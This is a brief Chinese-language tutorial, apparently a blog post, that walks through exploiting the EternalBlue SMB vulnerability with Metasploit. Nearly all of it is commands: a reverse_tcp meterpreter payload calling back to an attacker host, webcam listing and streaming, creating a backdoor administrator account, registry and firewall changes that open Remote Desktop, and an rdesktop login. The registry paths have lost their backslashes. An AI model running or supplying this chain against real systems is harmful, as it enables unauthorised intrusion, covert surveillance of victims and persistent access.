首先,EternalBlue是指Windows系統的445埠上的SMB(Server Message Block)協議存在的一個特定漏洞的利用工具,通過使用該工具攻擊具有這個特定漏洞的SMB協議,即可獲得該系統的Shell。
msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.31.51 run
use exploit/windows/smb/ms17_010_eternalblue set LHOST 192.168.31.95 set LPORT 4444 set payload windows/x64/meterpreter/reverse_tcp set RHOST 192.168.31.51 run
webcam_list
webcam_stream
shell
calc
net user /add Tom tom123123 net localgroup administrators Tom /add
reg add "hklmsystemcurrentControlSetControlTerminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklmsystemcurrentControlSetControlTerminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
sc config TermService start= auto net start Termservice
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
rdesktop 192.168.31.51:3389
推薦閱讀: